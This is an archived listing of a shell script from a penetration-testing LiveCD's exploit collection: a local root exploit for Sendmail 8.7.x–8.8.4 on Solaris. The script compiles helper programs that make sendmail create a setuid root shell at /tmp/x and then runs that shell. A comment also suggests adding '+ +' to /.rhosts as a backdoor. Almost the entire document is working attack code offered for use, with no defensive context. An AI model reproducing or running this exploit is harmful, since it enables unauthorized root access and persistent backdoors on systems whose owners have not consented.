home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / spacedog.sh < prev   
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  1.3 KB  |  54 lines
  1. #!/bin/sh
  2. #
  3. # Spac3D0g's Sendmail 8.7.x-8.8.4 root 'sploit.
  4. # (Rewritten from Leshka's to support Solaris)
  5. #
  6. # Tested on Solaris 2.5, 2.5.1, other OS's too..
  8. # Should create a suid program /tmp/x that calls shell as root.
  9. #
  10. # Modify RUN in x.c for what you wanna run, and possibly the location
  11. # or format of the ps command in the KILL line below for your platform.
  12. #
  13. # Or you could remove x.c alltogether and just put what you wanna do as
  14. # root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
  15. #
  16. #
  17. cat << _EOF_ >/tmp/x.c
  18.  #define RUN "/bin/ksh"
  19.  #include<stdio.h>
  20.  main()
  21.  {
  22.     execl(RUN,RUN,NULL);
  23.  }
  24. _EOF_
  25. #
  26. cat << _EOF_ >/tmp/spawnfish.c
  27.  main()
  28.  {
  29.    execl("/usr/lib/sendmail","/tmp/smtpd",0);      
  30.  }                                             
  31. _EOF_
  32. #
  33. cat << _EOF_ >/tmp/smtpd.c
  34.  main()
  35.  {
  36.    setuid(0); setgid(0); 
  37.    system("chown root /tmp/x ;chmod 4755 /tmp/x");
  38.  }
  39. _EOF_
  40. #
  41. #
  42. gcc -O  -o /tmp/x /tmp/x.c
  43. gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
  44. gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
  45. #
  46. /tmp/spawnfish
  47. kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
  48. rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
  49. sleep 5
  50. if [ -u /tmp/x ] ; then
  51.    echo "leet..."
  52.    /tmp/x
  53. fi
  54.